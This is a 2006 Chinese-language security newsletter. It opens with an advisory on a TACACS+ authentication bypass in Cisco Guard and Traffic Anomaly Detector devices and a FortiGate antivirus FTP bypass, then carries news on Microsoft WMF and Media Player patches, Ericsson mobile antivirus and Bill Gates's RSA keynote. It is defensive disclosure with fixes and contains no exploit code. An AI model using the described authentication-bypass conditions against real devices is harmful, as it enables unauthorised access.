BUGTRAQ ID: 16661
Cisco Guard和Cisco Traffic Anomaly Detector设备都是缓解分布式拒绝服务（DDoS）攻击的设备，可以检测是否存在潜在的DDoS攻击，并转移流向所监控网络的攻击流量而不会影响合法通讯流。
Cisco Guard和Cisco Anomaly Traffic Detector对访问认证处理上存在漏洞，在某些情况下，攻击者可以绕过访问认证，获取非授权访问权限。
如果Cisco Guard和Cisco Anomaly Traffic Detector设备配置为使用外部TACACS+服务器对登录到设备的用户进行认证，而tacacs-server host命令没有指定实际的TACACS+服务器，则可以绕过认证。绕过认证用户可得到的权限取决于登录所使用的帐号类型，以及设备上是否存在帐号，情况如下：
* 使用不存在的帐号：用户只能执行show命令
* 使用已有的本地帐号：用户可获得正常给予该帐号相同的权限
* 使用已有的Linux帐号：用户可访问基础Linux shell
此外，如果通过aaa authentication enable tacacs+命令对TACACS+服务器执行enable认证且没有通过tacacs-server host命令指定实际的TACACS+服务器的话，用户还可以绕过enable命令的认证。
请注意仅在缺少tacacs-server host命令的情况下设备才存在漏洞。如果存在这条命令则即使服务器的IP地址不正确，或无法到达TACACS+服务器，设备也没有漏洞。
建议：
临时解决方法：
如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：
* 通过tacacs-server host 命令指定TACACS+服务器，完成TACACS+认证配置。
厂商补丁：
Cisco
-----
Cisco已经为此发布了一个安全公告（cisco-sa-20060215-guard）以及相应补丁:
cisco-sa-20060215-guard：TACACS+ Authentication Bypass in Cisco Anomaly Detection and Mitigation Products
链接：http://www.cisco.com/warp/public/707/cisco-sa-20060215-guard.shtml
补丁下载：
Cisco Guard设备软件下载位于
http://www.cisco.com/pcgi-bin/tablebuild.pl/cisco-ga-crypto
Cisco Traffic Anomaly Detector设备软件下载位于
http://www.cisco.com/pcgi-bin/tablebuild.pl/cisco-ad-crypto
Cisco Catalyst 6500交换机/Cisco 7600路由器的Cisco Anomaly Guard模块软件下载位于
http://www.cisco.com/pcgi-bin/tablebuild.pl/cisco-agm-crypto
Cisco Catalyst 6500交换机/Cisco 7600路由器的Cisco Anomaly Traffic Detector模块软件下载位于
http://www.cisco.com/pcgi-bin/tablebuild.pl/cisco-adm-crypto
二:安全信息
Fortinet FortiGate杀毒引擎绕过检测漏洞
发布日期：2006-02-13
更新日期：2006-02-13
受影响系统：
Fortinet FortiOS 3 beta
Fortinet FortiOS 2.8 MR10
描述：
BUGTRAQ ID: 16597
CVE(CAN) ID: CAN-2005-3057
Fortinet FortiGate是一款流行的硬件防火墙。
Fortinet FortiGate对文件的过滤检查实现上存在问题，攻击可能绕过对系统对恶意数据的检查。
在特定的条件下，如果攻击者通过FTP发送文件的话，就可能绕过Fortinet杀毒引擎，在受保护的系统上执行任意代码。
建议：
厂商补丁：
Fortinet
--------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.fortinetfirewall.com/index.php
Windows发现两处缺陷黑客可完全控制系统
发布日期：2006-02-10
CNET科技资讯网
　　CNET科技资讯网2月9日国际报道美国当地时间本周二，微软公司向用户警告了二个安全缺陷，并表示正在对第三个可能的缺陷进行调查。
　　一个安全问题与以前版本的IE在Windows ME和Windows 2000上处理WMF 图像有关。微软在安全公告中说，这一缺陷只存在Windows 2000 SP4+IE 5.01平台和Windows ME SP2+IE 5.5 平台。
　　只要在网站、电子邮件、图像浏览软件中浏览恶意图像，用户就会受到攻击。微软称，成功地利用该缺陷的黑客能够完全控制受影响的系统。
　　微软表示，这一WMF 缺陷可能与以前的与WMF 相关的缺陷相似，但它们并不相同。上个月，微软发布了一款补丁软件，修正了被黑客用来在Windows PC上安装间谍件的缺陷。
　　微软建议，为了解决新的WMF 问题，用户应当升级到IE 6+SP1，并表示它可能发布一款补丁软件。
　　在第二份安全公告中，微软警告称Windows XP和Windows Server 2003 存在用户访问权限“膨胀”的问题，这一问题只存在于没有安装最新服务包的系统上。权限较低的用户可以利用该缺陷运行正常情况下要求较高权限的软件和命令。
　　微软建议在Windows XP上安装SP2 、在Windows Server 2003 上安装SP1 ，或以手动方式修改4 个受影响的Windows 组件的访问权限。
　　除了发布安全公告外，微软的一名代表在本周二表示，微软正在对HTML Help Workshop中第三个可能的缺陷进行调查。利用该缺陷的攻击代码已经被公开发布出来。
　　安全厂商Secunia 公司在一份安全公告中说，成功的攻击可能使黑客完全控制存在缺陷的计算机。
　　据微软称，该缺陷影响的范围非常有限，因为受影响的软件只被软件开发人员使用，而且也不是Windows 的一部分。
　　这名代表说，微软最初的调查显示，没有安装HTML Help SDK 的客户不会受到该问题的影响。
微软本周二发布例行安全更新修复7个漏洞
发布日期：2006-02-11
新浪科技
　　新浪科技讯北京时间2月11日消息，据国外媒体报道，微软将于下周二发布每月例行安全更新。届时微软将公布7个安全漏洞并发布相关补丁，这是去年10月以来最多的一次。
　　微软表示，即将公布的7个安全漏洞中，至少有两个是“高危”漏洞。“高危”是微软安全漏洞的最高级别，意味着可以远程利用。在两个“高危”漏洞中，有一个存在于Windows 媒体播放器，到目前为止，微软还没有公布关于此漏洞的更多细节。据丹麦安全公司Secunia称，目前还没有发现媒体播放器中存在“高危”漏洞，这意味着黑客并不知道这一漏洞，因此还没有相关的利用程序。
　　据微软称，7个安全漏洞中有4个存在于Windows操作系统，其中至少有一个是“高危”漏洞。美国安全公司eEye数字安全在其网页上公布了4个公开Windows漏洞，其中最老的一个早在2005年5月就已经报告给微软。Secunia则宣称，仅Windows XP操作系统就存在26个未打补丁的漏洞。通常情况下，微软需要花上一段时间来开发和测试补丁。
　　除上述5个漏洞外，另外两个漏洞都存在于Office办公软件，安全级别为“重要”。微软还将发布一个同安全无关、高优先级的Windows更新，并推出最新版的Windows恶意软件清除工具。新版Windows恶意软件清除工具将可以对付上周发作的Kama Sutra/MyWife/Nyxem蠕虫。
爱立信针对运营商环境推移动反病毒解决方案
发布日期：2006-02-12
ChinaByte
　　天极网2月12日消息(羽人　编译)据外电报道，爱立信在移动市场上悄无声息地进行着一项重要的业务活动，公司将推出其自称是业界首个专门针对运营商环境的移动反病毒解决方案。
　　爱立信移动设备反病毒解决方案现在已经作为爱立信移动数据解决方案产品组合的一部分推向了市场，该解决方案向企业提供了对企业至关重要数据应用的安全移动接入。
　　爱立信移动设备反病毒解决方案为运行Symbian软件和微软操作系统的智能手机提供了反病毒及SMS垃圾信息保护的集中控制。该解决方案可以作为一个单独的产品，也可作为一个封装移动数据解决方案的一部分，或作为一个托管解决方案被获取使用。
　　爱立信移动应用总监Katarina Löweberg说:“由于智能手机性能的提高，对企业来说保护它们自己免受这些设备可能面临的不断增长的安全威胁尤为重要。移动运营商现在可以首次向它们的企业用户提供对智能手机的集中管理保护，保护智能手机免受SMS垃圾信息和病毒等恶意代码的威胁。”
　　爱立信的移动数据解决方案策略将把最佳的室内及第三方开发产品与针对企业的端对端整合解决方案结合在一起。爱立信移动设备反病毒解决方案是以市场领先的及获奖的Trend Micro Mobile Security产品为基础，其集中的管理和分配支持管理员接入所有客户设备，管理、更新和自动化要求以保护设备免受各种威胁。它们还能获取有关设备操作系统平台、扫描引擎以及病毒种类的集中报告
微软发布月度安全公告修复高危级WMF漏洞
发布日期：2006-02-17
eNet硅谷动力
　　【eNet硅谷动力消息】美国东部时间2月14日（北京时间2月15日）消息：作为其月度升级的一部分，微软公司在星期二的时候发布了七个安全公告，其中包括一个用来修复IE浏览器中的Windows元文件（Windows Meta File，WMF）漏洞的“高危级”补丁文件。
　　微软公司将7.1版Windows媒体播放机中存在的另一个漏洞也评定为“高危级”漏洞，同时这次发布的安全升级文件中也包括了修复这个漏洞的补丁文件。其他的五个公告都是“重要级”的。
　　上个星期，微软公司发现了WMF漏洞之后已经发布了一份安全建议书，本周二才发布了IE的升级补丁。微软公司在安全建议书中称，这个漏洞只存在于Windows 2000操作系统中的5.01版IE SP4和Windows ME操作系统中的5.5版IE SP2中。
　　利用这个漏洞，攻击者可以对存有漏洞的系统发起攻击进而控制住有漏洞的系统。微软公司在上个星期还建议用户将IE浏览器升级到6.0版IE SP1。
　　微软公司还修复了Windows 98/98SE/ME/2000操作系统中的7.1版Windows 媒体播放机、Windows XP操作系统中的8.0版Windows媒体播放机、Windows 2000/XP SP 2/Server 2003操作系统中的9.0版Windows媒体播放机、Windows 98/98SE/ME/XP（含SP2及以下）操作系统中的10.0版Windows 媒体播放机中存在漏洞。
　　攻击者可能会利用Windows媒体播放机中的漏洞，通过在各种定制化版本的Windows媒体播放机软件中内建的恶意图片发起攻击并远程控制住存在漏洞的系统。
　　微软公司说：“攻击者还可以通过Microsoft IE浏览器来利用这个安全漏洞，因为许多用户经常从网络上下载媒体文件。IE浏览器一般都会自动打开媒体播放机软件来播放那些媒体文件，攻击者就很有可能利用在网页上放置恶意定制化文件的方式来发起攻击。”
　　对于任何在不需要用户自主操作的情况下也会导致恶意网络蠕虫扩散的安全威胁，微软公司都会将它评定为“严重级”的安全漏洞
盖茨归结安全问题急待解决四个方面
发布日期：2006-02-17
赛迪网
　　2006年2月14日，比尔盖茨以一个对安全现状的综述性报告拉开了RSA安全大会的帷幕。作为微软的首席软件架构师，盖茨说，要想提升整个社会的安全性，业界首先必须做到四个方面。因为，这是一个越来越数字化的社会。
　　盖茨的开场很轻松，他说他很高兴能够在RSA演讲。他说:“现在，我真的是感到非常安全。”
　　接着，盖茨对未来安全的重要性展开讨论，并把所有迫切需要做的事情分为四类:信任系统(trust ecosystem)、安全工程(engineering for security)、简易性(simplicity)和基础的安全平台(fundamentally secure platforms)。
　　盖茨说，要确保安全问题不会阻止我们前行的脚步真是一个非常大的挑战。英特网对于生产力、对于可靠性、对于隐私，都是非常关键的基础设施，所以我们不仅要有安全的方法，还必须要使得这些方法易于管理，让用户能力真正理解，才有可能战胜困难、实现梦想。这就意味着，从现在开始，我们需要许许多多的发明和大幅度的提升。
　　至于为了满足他那四项主要目标微软有哪些新的举措，盖茨未提及很多。相反，他主要围绕即将面世的Windows Vista客户端操作系统的一些特性来谈，包括对智能卡的支持、InfoCard身份认证技术以及IE浏览器方面的改进。
　　盖茨做出的惟一宣布就是，微软的认证生命周期管理器(Certificate Lifecycle Manager)现在处于测试状态。而这惟一的宣布也不是正式做出的，在演示丢失了智能卡、笔记本电脑和手机的用户怎样迅速找到替代品的时候，解说旁白中透露的这一消息。
　　盖茨使用这一演示来强调他的提升安全四大要点之一的信任系统。
　　盖茨说，我们有信任链，我们所需要做的就是去跟踪那些信任关系、获得准许、然后撤回那些信任关系、建立好名声。他说，今天，人们生活在一个没有信任系统的世界。解决问题的可以是一个特有的软件，也可以是一个特别的组织，但所有的东西必须形成一个联盟，以便人们能够理解所有的信任声明并对之进行推理验证。这样，我们就可以得到好名声，无论是对代码还是对用户，在所参与的各种各样的活动中我们都可以得到好名声。
　　盖茨说，信任系统中的一个关键是关于人的，并且需要管理认证，包括已发布的认证和撤回的认证。他说，在接下来的三到四年中，用户应该能够看到，智能卡的形式会从密码向双因子认证转变。他还说，高质量的认证可以帮助用户可靠地识别网站所有者。
　　谈到安全工程，盖茨用了一个例子来阐述:微软使用工具和新的设计方法来开发安全的代码，仅仅这样并不能保证安全，还必须保证代码得到了正确的操作。
　　至于简易性，盖茨说，微软一定会有大幅度的提升。
　　他说，你所必须用到的显示器的数量还是太高，想要搞清楚目前运行的是什么，你所必须要走的地方还是太多。提升的空间很大。
　　盖茨说，微软已经在努力做得更好了，比如，在Vista中加入了OneCare安全服务、提高了该操作系统中安全中心的性能、IT部门使用了组策略控制(group policy controls)，并且还使用了InfoCare。现在，IE 7.0可以支持InfoCard，从而使得用户可以控制自己身份信息的传播。
　　盖茨说，现在，安全和管理已经不是完全独立的两件事情了。
　　在他的“基础的安全平台”目标下，盖茨说，就安全性而言，Vista会把微软带到新的高度。他强调了限制管理权限并防止恶意代码杀来的用户保护控制，同时还提到了阻止间谍软件的Windows Defender。大会当天会发布Defender的Beta 2版本。
　　最后，盖茨说，业界需要致力于这四个方面才能真正提升安全性。

请记住技术无忧网中文域名 http://www.技术无忧.com